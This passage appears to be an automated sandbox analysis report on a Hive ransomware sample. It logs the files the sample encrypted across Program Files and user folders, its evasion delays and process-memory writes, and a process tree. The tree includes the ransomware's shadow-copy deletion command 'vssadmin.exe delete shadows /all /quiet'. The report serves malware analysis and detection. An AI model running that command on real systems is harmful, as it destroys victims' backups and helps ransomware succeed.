File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A

Drops file in Program Files directory

Description	Indicator	Process	Target
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\OFFSYMXB.TTF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions2x.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\th.pak	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_OEM_Perp-ul-phn.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ppd.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Reflection.DispatchProxy.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE.xhylKSmuz5RNbZ6NUxzXXl1z1Llp7988Z82sMGmoKzY.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\en-GB.pak.DATA	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_TileMediumSquare.scale-100.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\OrientationControlCone.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_retina.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\TipRes.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-ae\ui-strings.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\WebviewOffline.html	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\Wide310x150Logo.scale-200.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\ui-strings.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldNotThrow.snippets.ps1xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Microsoft.Vbe.Interop.dll.xhylKSmuz5RNbZ6NUxzXXhH4QPoJ3sptJm3jUOv79yA.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\WideLogo.scale-100_contrast-black.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\api-ms-win-core-util-l1-1-0.dll.xhylKSmuz5RNbZ6NUxzXXoaMYv-VtvQnY7j94fIKw2c.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\kk\msipc.dll.mui	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\Keywords.HxK	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBCN6.CHM	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-white\WideTile.scale-200.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ITCKRIST.TTF.xhylKSmuz5RNbZ6NUxzXXiB8Xp4h7IRlxbfcwtaDC1c.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\8080_36x36x32.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\OIMG.DLL	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre-1.8\lib\flavormap.properties.xhylKSmuz5RNbZ6NUxzXXvTOAj-qg8A95u6AO2R0KCU.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.ServiceModel.Web.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\pt-PT.pak.DATA	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\Wide310x150Logo.scale-125.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sw\LC_MESSAGES\vlc.mo	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSplashLogo.scale-200.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\System\ole db\xmlrwbin.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WorldClockSmallTile.contrast-black_scale-125.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageWideTile.scale-150.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\It.snippets.ps1xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\goopdateres_vi.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailSmallTile.scale-125.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\msdaer.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\gl.pak.DATA	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-oob.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Retail-ul-oob.xrm-ms.xhylKSmuz5RNbZ6NUxzXXk9pUMQCpzYNCsVEnAHz7iU.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\SmallTile.scale-100.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderStoreLogo.contrast-black_scale-100.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_agreement_filetype.svg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\bun.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO.DLL.xhylKSmuz5RNbZ6NUxzXXj8xx3rS5iJ-C8wFzHKKCxg.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\subscription_intro\multiple-plans.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\tmpersistence_xl.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-black_scale-125.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\ja\msipc.dll.mui.xhylKSmuz5RNbZ6NUxzXXjXcBHj2oBoW-1ozTi16hRk.hive	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\ui-strings.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-pl.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\WindowsBase.dll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\SmallTile.scale-125.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ko_get.svg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\mecontrol.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg2.jpg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Generic-Light.scale-100.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarSplashLogo.scale-400.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A

Delays execution with timeout.exe

evasion

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	N/A	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	C:\Windows\system32\timeout.exe	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Interacts with shadow copies

ransomware

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\vssadmin.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 4344 wrote to memory of 688	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	C:\Windows\system32\cmd.exe
PID 4344 wrote to memory of 688	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	C:\Windows\system32\cmd.exe
PID 4344 wrote to memory of 1424	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	C:\Windows\system32\cmd.exe
PID 4344 wrote to memory of 1424	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	C:\Windows\system32\cmd.exe
PID 688 wrote to memory of 4332	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4332	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 1424 wrote to memory of 1436	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 1424 wrote to memory of 1436	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\vssadmin.exe
PID 688 wrote to memory of 3456	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3456	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1012	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1012	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 228	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 228	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 376	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 376	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2608	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2608	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1932	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1932	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4512	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4512	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3492	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3492	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3236	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3236	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2716	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2716	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3304	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3304	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 388	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 388	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4396	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4396	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2720	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2720	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 712	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 712	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3908	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3908	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2512	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2512	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1892	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1892	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1104	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1104	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3692	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3692	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4988	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4988	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2936	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 2936	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1928	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1928	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1644	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 1644	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3064	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 3064	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 5080	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 5080	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 972	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 972	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4912	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe
PID 688 wrote to memory of 4912	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\timeout.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c hive.bat >NUL 2>NUL

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c shadow.bat >NUL 2>NUL

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\timeout.exe

timeout 1

